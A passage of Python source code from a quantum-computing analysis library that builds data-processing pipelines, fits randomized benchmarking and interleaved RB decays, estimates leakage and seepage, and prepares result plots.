4 for 2QB RB, 2 for 1QB RB\n :param cal_points: CalibrationPoints object\n :param ro_thresholds: optional (the threshold_data node can also extract\n them from the data_dict. See docstring there).\n Dict with meas_obj_names as keys and their readout thresholds as values.\n :param nreps: int specifying the number of files to combine into one\n measurement. IMPORTANT! This feature only works if the measurement was\n split by seeds, not by cliffords. Meaning that each measurement file\n contains data for all the Cliffords in sweep_points, but for a subset\n of the total seeds.\n :param interleaved_irb: bool specifying whether the measurement was\n IRB with RB and IRB interleaved.\n :param plot_all_shots: bool specifying whether to produce a raw plot of\n of all the shots vs cliffords. SEE WARNING ABOVE.\n :param sweep_type: dict of the form\n {'cliffords': sweep_dim, 'seeds': sweep_dim} where sweep_dim is either\n 0 or 1 and specifies whether the measurement was run with seeds in the\n fast dimension (0) and cliffords in the slow dimensino (1), or the other\n way around.\n :param compression_factor: sequence compression factor\n :param processing_pipeline: ProcessingPipeline instance to which this\n function will append.\n :return: the unresolved ProcessingPipeline\n \"\"\"\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n slow_cliffords = sweep_type['cliffords'] == 1\n\n nr_swpts0 = sweep_points.length(0)\n nr_swpts1 = sweep_points.length(1)\n n_segments = nr_swpts0 * compression_factor\n n_sequences = (nr_swpts1 * (interleaved_irb + 1)) // compression_factor\n\n if processing_pipeline is None:\n processing_pipeline = pp_mod.ProcessingPipeline()\n if nreps > 1:\n processing_pipeline.add_node('combine_datafiles_split_by_seeds',\n keys_in='raw',\n n_shots=n_shots,\n sweep_type=sweep_type,\n interleaved_irb=interleaved_irb,\n meas_obj_names=meas_obj_names)\n keys_in = 'previous combine_datafiles_split_by_seeds' if nreps > 1 else 'raw'\n processing_pipeline.add_node('threshold_data',\n keys_in=keys_in,\n ro_thresholds=ro_thresholds,\n meas_obj_names=meas_obj_names)\n processing_pipeline.add_node('average_data',\n shape=(n_sequences, n_shots, n_segments),\n final_shape=(n_sequences*n_segments),\n averaging_axis=1,\n keys_in='previous threshold_data',\n meas_obj_names=meas_obj_names)\n if plot_all_shots:\n for mobjn in meas_obj_names:\n cliffords = sweep_points.get_sweep_params_property(\n 'values', sweep_type['cliffords'], mospm[mobjn])[0]\n keys_in = 'previous combine_datafiles_split_by_seeds' \\\n if nreps > 1 else 'raw'\n if slow_cliffords:\n xvals = np.repeat(cliffords, 2*n_segments*n_shots if\n interleaved_irb else n_segments*n_shots)\n else:\n xvals = np.repeat(cliffords, n_sequences*n_shots)\n processing_pipeline.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][-1],\n xvals=xvals,\n do_plotting=False,\n figname_suffix=f'shots',\n title_suffix=' - All shots',\n plot_params={'linestyle': 'none'},\n keys_in=keys_in,\n keys_out=None,\n meas_obj_names=mobjn)\n\n if dim_hilbert == 4:\n processing_pipeline.add_node('correlate_qubits',\n keys_in='previous threshold_data',\n meas_obj_names=meas_obj_names,\n joint_processing=True, num_keys_out=1,\n keys_out_container='correlation_object',\n add_mobjn_container=False)\n processing_pipeline.add_node('average_data',\n shape=(n_sequences, n_shots, n_segments),\n final_shape=(n_sequences*n_segments),\n averaging_axis=1,\n keys_in='previous correlate_qubits',\n meas_obj_names=['correlation_object'])\n\n meas_obj_names = deepcopy(meas_obj_names)\n meas_obj_names += ['correlation_object']\n mospm['correlation_object'] = list(mospm.values())[0]\n labels = ['rb', 'irb'] if interleaved_irb else ['rb']\n for label in labels:\n pp = pp_mod.ProcessingPipeline(keys_out_container=label)\n keys_in_0 = 'previous average_data'\n if interleaved_irb:\n pp.add_node('submsmt_data_from_interleaved_msmt',\n msmt_name=label,\n keys_in='previous average_data',\n meas_obj_names=meas_obj_names)\n keys_in_0 = f'previous {label}.submsmt_data_from_interleaved_msmt'\n pp.add_node('average_data',\n shape=(nr_swpts1, nr_swpts0),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in=keys_in_0,\n meas_obj_names=meas_obj_names)\n pp.add_node('get_std_deviation',\n shape=(nr_swpts1, nr_swpts0),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in=keys_in_0,\n meas_obj_names=meas_obj_names)\n pp.add_node('rb_analysis',\n d=dim_hilbert,\n sweep_type=sweep_type,\n msmt_type=label,\n state_prob_name='e' if dim_hilbert==2 else None,\n keys_in=f'previous {label}.average_data',\n keys_in_std=f'previous {label}.get_std_deviation',\n keys_in_all_seeds_data=keys_in_0,\n do_plotting=False,\n keys_out=None,\n meas_obj_names=meas_obj_names)\n for mobjn in meas_obj_names:\n cliffords = sweep_points.get_sweep_params_property(\n 'values', sweep_type['cliffords'], mospm[mobjn])[0]\n xvals = np.repeat(cliffords, nr_swpts0) if slow_cliffords else \\\n np.tile(cliffords, nr_swpts1)\n pp.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][-1],\n xvals=xvals,\n do_plotting=False,\n figname_suffix=f'{label}',\n title_suffix=' - All seeds',\n plot_params={'linestyle': 'none'},\n ylabel='Probability, ' + ('$P(|ee\\\\rangle)$' if\n mobjn=='correlation_object' else '$P(|e\\\\rangle)$'),\n yunit='',\n keys_in=keys_in_0,\n keys_out=None,\n meas_obj_names=mobjn)\n processing_pipeline += pp\n\n if interleaved_irb:\n # calculate interleaved gate error\n processing_pipeline.add_node(\n 'irb_gate_error', meas_obj_names='correlation_object' if\n dim_hilbert == 4 else meas_obj_names, d=dim_hilbert)\n\n # do plotting of all plot_dicts in the data_dict\n if params.get('do_plotting', True):\n processing_pipeline.add_node('plot')\n\n return processing_pipeline\n\n\n# nodes related to extracting data\ndef combine_datafiles_split_by_seeds(data_dict, keys_in, keys_out,\n interleaved_irb=False, **params):\n \"\"\"\n NOT FULLY IMPLEMENTED FOR slow_cliffords == True!!!\n Combines the data from an (interleaved) RB/IRB measurement that was saved in\n multiple files into one data set that would look as if it had all been\n taken in one measurement (one file).\n :param data_dict: OrderedDict containing data to be processed and where\n processed data is to be stored\n :param keys_in: list of key names or dictionary keys paths in\n data_dict for the data to be processed\n :param keys_out: list of key names or dictionary keys paths in\n data_dict for the processed data to be saved into\n :param interleaved_irb: bool specifying whether the measurement was\n IRB with RB and IRB interleaved.\n :param params: keyword arguments:\n Should contain 'exp_metadata_list', 'n_shots', 'mospm', 'rev_movnm',\n 'cp' if they are not in data_dict\n ToDo: put n_shots info in the metadata (27.07.2020)\n :return:\n\n Assumptions:\n - ASSUMES MEASUREMENT WAS SPLIT BY SEEDS NOT BY CLIFFORDS. Meaning that\n each measurement file contains data for all the Cliffords in\n sweep_points, but for a subset of the total seeds.\n\n \"\"\"\n assert len(keys_in) == len(keys_out)\n\n n_shots = hlp_mod.get_param('n_shots', data_dict, default_value=1, **params)\n mospm, rev_movnm, cp, mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mospm', 'rev_movnm', 'cp', 'mobjn'],\n **params)\n metadata_list = hlp_mod.get_param('exp_metadata_list', data_dict,\n raise_error=True, **params)\n sp_list = [hlp_mod.get_param('sweep_points', mdl, raise_error=True)\n for mdl in metadata_list]\n sp0 = sp_mod.SweepPoints(sp_list[0])\n\n nr_segments = sp0.length(0) + len(cp.states)\n nr_uploads = sp0.length(1)\n chunk = nr_segments*n_shots\n\n data_to_proc_dict = hlp_mod.get_data_to_process(data_dict, keys_in)\n for keyi, keyo in zip(keys_in, keys_out):\n data = data_to_proc_dict[keyi]\n if np.ndim(data) != 2:\n raise ValueError(f'Data corresponding to {keyi} is not 2D.')\n # take the segment_chunk * n_shots for each clifford from each row\n # (corresponding to data from one data file) in data and concatenate\n # them. Put all the nr_cliffords concatenations in the\n # list data_combined\n data_combined = [np.concatenate(\n [d[m * chunk + j * nr_segments: m * chunk + (j + 1) * nr_segments]\n for d in data])\n for m in np.arange((interleaved_irb + 1)*nr_uploads)\n for j in np.arange(n_shots)]\n # concatenate all the lists in data_combined to get one complete\n # array of data\n data_combined = np.concatenate(data_combined)\n hlp_mod.add_param(keyo, data_combined, data_dict, **params)\n\n # update the sweep_points if they were a list\n nr_sp0 = sp0.length(0)\n nr_exp = len(sp_list)\n sp_all_vals_list = [np.zeros(nr_exp*nr_sp0, dtype=int) for _\n in range(len(sp0.get_sweep_dimension(0)))]\n\n for i, sp in enumerate(sp_list):\n sp = sp_mod.SweepPoints(sp)\n sp_vals_list = sp.get_sweep_params_property('values', 0, 'all')\n for j, sp_vals in enumerate(sp_vals_list):\n sp_all_vals_list[j][i::nr_exp] = sp_vals\n\n sweep_points = sp_mod.SweepPoints()\n for i, sp_name in enumerate(sp0.get_sweep_dimension(0)):\n sweep_points.add_sweep_parameter(\n sp_name, sp_all_vals_list[i],\n sp0.get_sweep_params_property('unit', 0, sp_name),\n sp0.get_sweep_params_property('label', 0, sp_name))\n sweep_points += [sp0.get_sweep_dimension(1)]\n hlp_mod.add_param('exp_metadata.sweep_points', sweep_points,\n data_dict, add_param_method='replace')\n\n\ndef submsmt_data_from_interleaved_msmt(data_dict, keys_in, msmt_name,\n keys_out=None, sweep_type=None,\n **params):\n start_index = (msmt_name.lower() != 'rb')\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n slow_cliffords = sweep_type['cliffords'] == 1\n\n n_shots = hlp_mod.get_param('n_shots', data_dict, default_value=1, **params)\n data_to_proc_dict = hlp_mod.get_data_to_process(data_dict, keys_in)\n sp, cp = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['sp', 'cp'], **params)\n nr_seeds = sp.length(sweep_type['seeds']) + len(cp.states)\n nr_cliffords = sp.length(sweep_type['cliffords'])\n nr_segments = (nr_seeds if slow_cliffords else nr_cliffords) + len(cp.states)\n nr_uploads = (nr_cliffords if slow_cliffords else nr_seeds)\n\n if keys_out is None:\n keys_out = [f'{msmt_name}_data_from_interleaved_msmt.{s}'\n for s in keys_in]\n for keyi, keyo in zip(keys_in, keys_out):\n data = data_to_proc_dict[keyi]\n if len(data) != nr_segments * (2 * nr_uploads):\n raise ValueError(f'The data has the wrong size of {len(data)}, '\n f'which is not expected for {nr_segments} '\n f'segments and {nr_uploads} uploads.')\n selected_data = np.concatenate([\n data[j*nr_segments*n_shots:(j+1)*nr_segments*n_shots]\n for j in np.arange(2*nr_uploads)[start_index::2]])\n hlp_mod.add_param(\n keyo, selected_data, data_dict, **params)\n\n\ndef rb_analysis(data_dict, keys_in, sweep_type=None, **params):\n \"\"\"\n Does single qubit RB analysis. Prepares fits and plots, and extracts\n errors per clifford.\n :param data_dict: OrderedDict containing data to be processed and where\n processed data is to be stored\n :param keys_in: list of key names or dictionary keys paths in\n data_dict for the data to be processed\n\n Assumptions:\n - cal_points, sweep_points, qb_sweep_points_map, qb_name exist in\n metadata or params\n - expects a 2d sweep with nr_seeds on innermost sweep and cliffords\n on outermost\n - if active reset was used, 'filter' must be in the key names of the\n filtered data if you want the filtered raw data to be plotted\n \"\"\"\n data_to_proc_dict = hlp_mod.get_data_to_process(data_dict, keys_in)\n keys_in = list(data_to_proc_dict)\n\n prep_fit_dicts = hlp_mod.pop_param('prep_fit_dicts', data_dict,\n default_value=True, node_params=params)\n do_fitting = hlp_mod.pop_param('do_fitting', data_dict,\n default_value=True, node_params=params)\n prepare_plotting = hlp_mod.pop_param('prepare_plotting', data_dict,\n default_value=True, node_params=params)\n do_plotting = hlp_mod.pop_param('do_plotting', data_dict,\n default_value=True, node_params=params)\n\n sp, mospm, mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['sp', 'mospm', 'mobjn'], **params)\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n nr_seeds = sp.length(sweep_type['seeds'])\n if len(data_dict['timestamps']) > 1:\n nr_seeds *= len(data_dict['timestamps'])\n cliffords = sp.get_sweep_params_property('values', sweep_type['cliffords'],\n mospm[mobjn])[0]\n\n # prepare fitting\n if prep_fit_dicts:\n prepare_rb_fitting(data_dict, data_to_proc_dict, cliffords, nr_seeds,\n **params)\n\n if do_fitting:\n getattr(fit_mod, 'run_fitting')(data_dict, keys_in=list(\n data_dict['fit_dicts']),**params)\n # extract EPC, leakage, and seepage from fits and save to\n # data_dict[meas_obj_name]\n analyze_rb_fit_results(data_dict, keys_in, **params)\n\n # prepare plots\n if prepare_plotting:\n prepare_rb_plots(data_dict, keys_in, sweep_type, **params)\n if do_plotting:\n getattr(plot_mod, 'plot')(data_dict, keys_in=list(\n data_dict['plot_dicts']), **params)\n\n\ndef prepare_rb_fitting(data_dict, data_to_proc_dict, cliffords, nr_seeds,\n **params):\n cp, mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['cp', 'mobjn'], **params)\n conf_level = hlp_mod.get_param('conf_level', data_dict,\n default_value=0.68, **params)\n do_simple_fit = hlp_mod.get_param(\n 'do_simple_fit', data_dict, default_value=True, **params)\n d = hlp_mod.get_param('d', data_dict, raise_error=True, **params)\n print('d: ', d)\n guess_pars = {'A': {'value': 1},\n 'p': {'value': 0.99},\n 'B': {'value': 0}}\n fit_guess_params = hlp_mod.get_param('fit_guess_params', data_dict,\n default_value={}, **params)\n guess_pars.update(fit_guess_params)\n\n fit_dicts = OrderedDict()\n rb_mod = lmfit.Model(fit_mods.RandomizedBenchmarkingDecay)\n rb_mod.set_param_hint('Amplitude', **guess_pars['A'])\n rb_mod.set_param_hint('p', **guess_pars['p'])\n rb_mod.set_param_hint('offset', **guess_pars['B'])\n rb_mod.set_param_hint('fidelity_per_Clifford',\n expr=f'1-(({d}-1)*(1-p)/{d})')\n rb_mod.set_param_hint('error_per_Clifford',\n expr='1-fidelity_per_Clifford')\n gate_decomp = hlp_mod.get_param('gate_decomp', data_dict,\n default_value='HZ', **params)\n if gate_decomp == 'XY':\n rb_mod.set_param_hint('fidelity_per_gate',\n expr='fidelity_per_Clifford**(1./1.875)')\n elif gate_decomp == 'HZ':\n rb_mod.set_param_hint('fidelity_per_gate',\n expr='fidelity_per_Clifford**(1./1.125)')\n else:\n raise ValueError('Gate decomposition not recognized.')\n rb_mod.set_param_hint('error_per_gate', expr='1-fidelity_per_gate')\n guess_pars = rb_mod.make_params()\n\n keys_in_std = hlp_mod.get_param('keys_in_std', data_dict, raise_error=False,\n **params)\n if keys_in_std is None:\n keys_in_std = [''] * len(data_to_proc_dict)\n if len(keys_in_std) != len(data_to_proc_dict):\n raise ValueError('keys_in_std and keys_in do not have '\n 'the same length.')\n for keyi, keys in zip(data_to_proc_dict, keys_in_std):\n if 'pf' in keyi:\n # if this is the |f> state population data, then do an additional\n # fit based on the Google style\n fit_mod.prepare_rbleakage_fit_dict(\n data_dict, [keyi], indep_var_array=cliffords,\n fit_name='rbleak_fit', **params)\n\n # do standard fit to A*p**m + B\n key = 'rb_fit' + keyi\n data_fit = hlp_mod.get_msmt_data(data_to_proc_dict[keyi], cp, mobjn)\n\n model = deepcopy(rb_mod)\n fit_dicts[key] = {\n 'fit_fn': fit_mods.RandomizedBenchmarkingDecay,\n 'fit_xvals': {'numCliff': cliffords},\n 'fit_yvals': {'data': np.array(data_fit).flatten()},\n 'guess_pars': guess_pars}\n\n if do_simple_fit:\n fit_kwargs = {}\n elif keys is not None:\n stds = np.array(hlp_mod.get_param(keys, data_dict)).flatten()\n fit_kwargs = {'scale_covar': False,\n 'weights': 1/stds}\n else:\n # Run once to get an estimate for the error per Clifford\n fit_res = model.fit(data_fit, numCliff=cliffords,\n params=guess_pars)\n # Use the found error per Clifford to standard errors for\n # the data points fro Helsen et al. (2017)\n epsilon_guess = hlp_mod.get_param('epsilon_guess', data_dict,\n default_value=0.01, **params)\n epsilon = calculate_rb_confidence_intervals(\n nr_seeds=nr_seeds,\n nr_cliffords=cliffords,\n depolariz_param=fit_res.best_values['p'],\n conf_level=conf_level,\n epsilon_guess=epsilon_guess, d=2)\n\n hlp_mod.add_param(\n keys, epsilon, data_dict,\n add_param_method=params.get('add_param_method', None))\n # Run fit again with scale_covar=False, and\n # weights = 1/epsilon if an entry in epsilon_sqrd is 0,\n # replace it with half the minimum value in the epsilon_sqrd\n # array\n idxs = np.where(epsilon == 0)[0]\n epsilon[idxs] = min([eps for eps in epsilon if eps != 0])/2\n fit_kwargs = {'scale_covar': False, 'weights': 1/epsilon}\n fit_dicts[key]['fit_kwargs'] = fit_kwargs\n\n hlp_mod.add_param('fit_dicts', fit_dicts, data_dict,\n add_param_method='update')\n\n\ndef analyze_rb_fit_results(data_dict, keys_in, **params):\n mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'], **params)\n msmt_type = hlp_mod.get_param('msmt_type', data_dict, **params)\n keys_out_container = hlp_mod.get_param('keys_out_container', data_dict,\n default_value='', **params)\n if not len(keys_out_container) or keys_out_container is None:\n keys_out_container = f'{mobjn}.{msmt_type}'\n\n fit_dicts = hlp_mod.get_param('fit_dicts', data_dict, raise_error=True)\n for keyi in keys_in:\n fit_res = fit_dicts['rb_fit' + keyi]['fit_res']\n hlp_mod.add_param(f'{keys_out_container}.EPC value',\n fit_res.params['error_per_Clifford'].value,\n data_dict, add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.EPC stderr',\n fit_res.params['fidelity_per_Clifford'].stderr,\n data_dict, add_param_method='replace')\n hlp_mod.add_param(\n f'{keys_out_container}.depolarization parameter value',\n fit_res.params['p'].value, data_dict,\n add_param_method='replace')\n hlp_mod.add_param(\n f'{keys_out_container}.depolarization parameter stderr',\n fit_res.params['p'].stderr, data_dict,\n add_param_method='replace')\n\n if 'pf' in keyi:\n A = fit_res.best_values['Amplitude']\n Aerr = fit_res.params['Amplitude'].stderr\n p = fit_res.best_values['p']\n perr = fit_res.params['p'].stderr\n # IBM-style leakage and seepage:\n # https://journals.aps.org/pra/abstract/10.1103/PhysRevA.97.032306\n hlp_mod.add_param(f'{keys_out_container}.IBM-style leakage value',\n A*(1-p),\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.IBM-style leakage stderr',\n np.sqrt((A*perr)**2 + (Aerr*(p-1))**2),\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.IBM-style seepage value',\n (1-A)*(1-p),\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.IBM-style seepage stderr',\n np.sqrt((Aerr*(p-1))**2 + ((A-1)*perr)**2),\n data_dict,\n add_param_method='replace')\n\n # Google-style leakage and seepage:\n # https://journals.aps.org/prl/pdf/10.1103/PhysRevLett.116.020501\n fit_res = fit_dicts['rbleak_fit' + keyi]['fit_res']\n hlp_mod.add_param(f'{keys_out_container}.Google-style leakage value',\n fit_res.best_values['pu'],\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.Google-style leakage stderr',\n fit_res.params['pu'].stderr,\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.Google-style seepage value',\n fit_res.best_values['pd'],\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.Google-style seepage stderr',\n fit_res.params['pd'].stderr,\n data_dict,\n add_param_method='replace')\n\n if hlp_mod.get_param('plot_T1_lim', data_dict, default_value=False,\n **params):\n # get T1, T2, gate length from HDF file\n get_meas_obj_coh_times(data_dict, **params)\n F_T1, p_T1 = calc_rb_coherence_limited_fidelity(\n hlp_mod.get_param(f'{mobjn}.T1', data_dict, **params),\n hlp_mod.get_param(f'{mobjn}.T2', data_dict, **params),\n hlp_mod.get_param(f'{mobjn}.ge_sigma', data_dict, **params) *\n hlp_mod.get_param(f'{mobjn}.ge_nr_sigma', data_dict, **params),\n hlp_mod.get_param('gate_decomp', data_dict,\n default_value='HZ', **params))\n hlp_mod.add_param(f'{keys_out_container}.EPC coh_lim', 1-F_T1,\n data_dict, add_param_method='replace')\n hlp_mod.add_param(\n f'{keys_out_container}.depolarization parameter coh_lim', p_T1,\n data_dict, add_param_method='replace')\n\n\ndef prepare_rb_plots(data_dict, keys_in, sweep_type, **params):\n sp, cp, mospm, mobjn, movnm = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['sp', 'cp', 'mospm', 'mobjn', 'movnm'],\n **params)\n\n plot_dicts = OrderedDict()\n keys_in_std = hlp_mod.get_param('keys_in_std', data_dict, raise_error=False,\n **params)\n stpn = hlp_mod.get_param(\n 'state_prob_name', data_dict,\n default_value='gg' if 'corr' in mobjn else 'e', **params)\n classified_msmt = any([v == 3 for v in [len(chs) for chs in movnm.values()]])\n lw = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['lines.linewidth']\n ms = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['lines.markersize']\n llsp = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['legend.labelspacing']\n lcsp = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['legend.columnspacing']\n\n ylabel = hlp_mod.pop_param('ylabel', data_dict, node_params=params)\n if ylabel is None:\n if isinstance(stpn, (tuple, list)):\n # assumed of the form ('gg', '+', 'ee', '-', 'ge', '-', 'eg')\n prob_states = stpn[0::2]\n prob_labels = [f'$P(|{{{p}}}\\\\rangle)$' for p in prob_states]\n ylabel = (2*len(prob_states)-1)*['']\n ylabel[0::2] = prob_labels\n ylabel[1::2] = list(stpn[1::2])\n ylabel = ''.join(ylabel)\n else:\n ylabel = f'Probability, $P(|{{{stpn}}}\\\\rangle)$'\n figure_name_suffix = hlp_mod.get_param('figure_name_suffix', data_dict,\n default_value='', **params)\n for keyi, keys in zip(keys_in, keys_in_std):\n figure_name = f'RB_{keyi}_{mobjn}{figure_name_suffix}'\n sp_name = [p for p in mospm[mobjn] if 'clifford' in p][0]\n\n # plot data\n pd = \\\n plot_mod.prepare_1d_plot_dicts(data_dict=data_dict, keys_in=[keyi],\n figure_name=figure_name,\n ylabel=ylabel,\n sp_name=sp_name,\n yerr_key=keys,\n data_labels=['avg.'],\n plot_params={\n 'zorder': 2, 'marker': 'o',\n 'legend_ncol': 3,\n 'line_kws': {\n 'elinewidth': lw+3,\n 'markersize': ms+1,\n 'alpha_errorbars': 0.25}},\n do_plotting=False, **params)\n plot_dicts.update(pd)\n\n # plot all seeds\n keys_in_all_seeds_data = hlp_mod.get_param('keys_in_all_seeds_data',\n data_dict, **params)\n clf_dim = sweep_type['cliffords']\n seeds_dim = sweep_type['seeds']\n cliffords = sp.get_sweep_params_property('values', clf_dim, sp_name)\n xvals = np.repeat(cliffords, sp.length(seeds_dim)) if clf_dim == 1 \\\n else np.tile(cliffords, sp.length(seeds_dim))\n if keys_in_all_seeds_data is not None:\n\n pd = \\\n plot_mod.prepare_1d_plot_dicts(data_dict=data_dict,\n keys_in=keys_in_all_seeds_data,\n figure_name=figure_name,\n xvals=xvals,\n ylabel=ylabel,\n sp_name=sp_name,\n data_labels=['seeds'],\n plot_params={\n 'linestyle': 'none',\n 'marker': '.',\n 'color': 'gray',\n 'line_kws': {'alpha': 0.5},\n 'zorder': 1},\n do_plotting=False, **params)\n plot_dicts.update(pd)\n\n if len(cp.states) != 0:\n # plot cal states\n plot_dicts.update(\n plot_mod.prepare_cal_states_plot_dicts(data_dict=data_dict,\n keys_in=[keyi],\n figure_name=figure_name,\n sp_name=sp_name,\n do_plotting=False,\n **params))\n\n if 'fit_dicts' in data_dict:\n # plot fits\n fit_dicts = data_dict['fit_dicts']\n textstr = ''\n if 'pf' in keyi:\n # plot Google-style leakage fit + textbox\n plot_dicts.update(plot_mod.prepare_fit_plot_dicts(\n data_dict=data_dict,\n figure_name=figure_name,\n fit_names=['rbleak_fit' + keyi],\n plot_params={'color': 'C1',\n 'setlabel': 'fit - Google',\n 'legend_ncol': 3},\n do_plotting=False, **params))\n textstr += get_rb_textbox_properties(\n data_dict, fit_dicts['rbleak_fit' + keyi]['fit_res'],\n textstr_style=['leakage_google'],\n **params)[0]\n\n # plot fit trace\n pd = plot_mod.prepare_fit_plot_dicts(\n data_dict=data_dict,\n figure_name=figure_name,\n fit_names=['rb_fit' + keyi],\n plot_params={'color': 'C0',\n 'setlabel': 'fit - IBM' if 'pf' in keyi else 'fit',\n 'legend_ncol': 3},\n do_plotting=False, **params)\n plot_dicts.update(pd)\n\n # plot coherence-limit\n fit_res = fit_dicts['rb_fit' + keyi]['fit_res']\n if hlp_mod.get_param('plot_T1_lim', data_dict,\n default_value=False, **params) and 'pf' not in keyi:\n keys_out_container = hlp_mod.get_param('keys_out_container',\n data_dict,\n default_value=mobjn,\n **params)\n epc_T1 = hlp_mod.get_param(f'{keys_out_container}.EPC coh_lim',\n data_dict, **params)\n p_T1 = hlp_mod.get_param(\n f'{keys_out_container}.depolarization parameter coh_lim',\n data_dict, **params)\n clfs_fine = np.linspace(cliffords[0], cliffords[-1], 1000)\n T1_limited_curve = fit_res.model.func(\n clfs_fine, fit_res.best_values['Amplitude'], p_T1,\n fit_res.best_values['offset'])\n plot_dicts['t1Lim_' + keyi] = {\n 'fig_id': figure_name,\n 'plotfn': 'plot_line',\n 'xvals': clfs_fine,\n 'yvals': T1_limited_curve,\n 'setlabel': 'coh-lim',\n 'do_legend': True,\n 'linestyle': '--',\n 'line_kws': {'linewidth': lw-0.5},\n 'zorder': 0,\n 'marker': ''}\n else:\n epc_T1 = None\n\n # add texbox\n va_text = hlp_mod.get_param('va_text', data_dict, **params)\n if va_text is None:\n va_text = 'top' if 'g' in stpn else 'bottom'\n textstr, ha, hp, va, vp = get_rb_textbox_properties(\n data_dict, fit_res, epc_T1=None if 'pf' in keyi else epc_T1,\n va=va_text,\n textstr_style='leakage_ibm' if 'pf' in keyi else 'regular',\n textstr=textstr if 'pf' in keyi else '', **params)\n plot_dicts['text_msg_' + keyi] = {\n 'fig_id': figure_name,\n 'plotfn': 'plot_text',\n 'ypos': vp,\n 'xpos': hp,\n 'horizontalalignment': ha,\n 'verticalalignment': va,\n 'box_props': None,\n 'text_string': textstr}\n\n plot_dicts[list(plot_dicts)[-2]].update({\n 'legend_bbox_to_anchor': (1.025, -0.15),\n 'legend_pos': 'upper right',\n 'legend_labelspacing': llsp-0.25,\n 'legend_columnspacing': lcsp-1,\n 'legend_ncol': 1 if 'pf' in keyi else 2,\n 'yrange': hlp_mod.get_param('yrange', data_dict, **params)\n })\n hlp_mod.add_param('plot_dicts', plot_dicts, data_dict,\n add_param_method='update')\n\n\ndef prepare_irb_plot(data_dict, plot_dict_names_irb_plot=None,\n figure_name=None, **params):\n\n plot_dicts_updated = OrderedDict()\n do_plotting = params.pop('do_plotting', False)\n if figure_name is None:\n figure_name = 'IRB'\n\n mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'],\n **params)\n\n if plot_dict_names_irb_plot is None:\n plot_dict_names_irb_plot = hlp_mod.get_param(\n 'plot_dict_names_irb_plot', data_dict, **params)\n\n plot_dicts = hlp_mod.get_param('plot_dicts', data_dict, **params)\n for label in ['rb', 'irb']:\n epc_value = hlp_mod.get_param(f'{mobjn}.{label}.EPC value',\n data_dict, **params)\n print(epc_value)\n leg_label = ''\n if epc_value is not None:\n epc_stderr = hlp_mod.get_param(f'{mobjn}.{label}.EPC stderr',\n data_dict, **params)\n leg_label = f'{label.upper()}:\\t' \\\n f'{100*epc_value:.2f}%$\\\\pm${100*epc_stderr:.2f}% EPC'\n print(leg_label)\n plot_dicts_updated[f'legend_data_IRB_{label}'] = {\n 'fig_id': figure_name,\n 'plotfn': 'plot_line',\n 'xvals': [],\n 'yvals': [],\n 'color': 'C0' if label == 'rb' else 'C1',\n 'marker': 'o',\n 'linestyle': '-',\n 'setlabel': leg_label,\n }\n\n pd_plot_type = [pdn for pdn in plot_dict_names_irb_plot['rb']\n if 'seeds' in pdn]\n if len(pd_plot_type):\n pd_name = plot_dict_names_irb_plot['rb'][pd_plot_type[0]]\n plot_dicts_updated['legend_seeds_IRB'] = \\\n deepcopy(plot_dicts[f'{pd_name}'])\n plot_dicts_updated['legend_seeds_IRB'].update({\n 'xvals': [], 'yvals': [], 'yerr': None,\n 'setlabel': 'all seeds'})\n\n cz_err = hlp_mod.get_param('cz_err_value', data_dict, **params)\n if cz_err is None:\n cz_err = hlp_mod.get_param(\n 'correlation_object.average_gate_error_CZ value', data_dict)\n cz_err_stderr = hlp_mod.get_param('cz_err_stderr', data_dict, **params)\n if cz_err_stderr is None:\n cz_err_stderr = hlp_mod.get_param(\n 'correlation_object.average_gate_error_CZ stderr', data_dict)\n if cz_err is not None:\n textstr = \\\n f'Gate error:\\n{100*cz_err:.2f}%$\\\\pm${100*cz_err_stderr:.2f}%'\n plot_dicts_updated['text_msg_IRB'] = {\n 'fig_id': figure_name,\n 'plotfn': 'plot_text',\n 'ypos': 0.05,\n 'xpos': 0.4,\n 'horizontalalignment': 'left',\n 'verticalalignment': 'bottom',\n 'box_props': None,\n 'text_string': textstr}\n\n for label in ['rb', 'irb']:\n for plot_type in list(plot_dict_names_irb_plot[label])[::-1]:\n pd_name = plot_dict_names_irb_plot[label][plot_type]\n plot_dicts_updated[f'{pd_name} IRB'] = deepcopy(plot_dicts[pd_name])\n updated_vals = {'fig_id': figure_name,\n 'color': 'C0' if label == 'rb' else 'C1',\n 'setlabel': '', 'legend_ncol': 1}\n plot_dicts_updated[f'{pd_name} IRB'].update(updated_vals)\n\n plotsize = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['figure.figsize']\n plotsize = (plotsize[0], 3*plotsize[1])\n last_pd = plot_dicts_updated[list(plot_dicts_updated)[-1]]\n last_pd.update({'legend_bbox_to_anchor': (0.35, 0.08),\n 'legend_ncol': 1,\n 'legend_pos': 'lower left',\n 'plotsize': plotsize})\n\n hlp_mod.add_param('plot_dicts', plot_dicts_updated, data_dict,\n add_param_method='update')\n if do_plotting:\n getattr(plot_mod, 'plot')(data_dict, 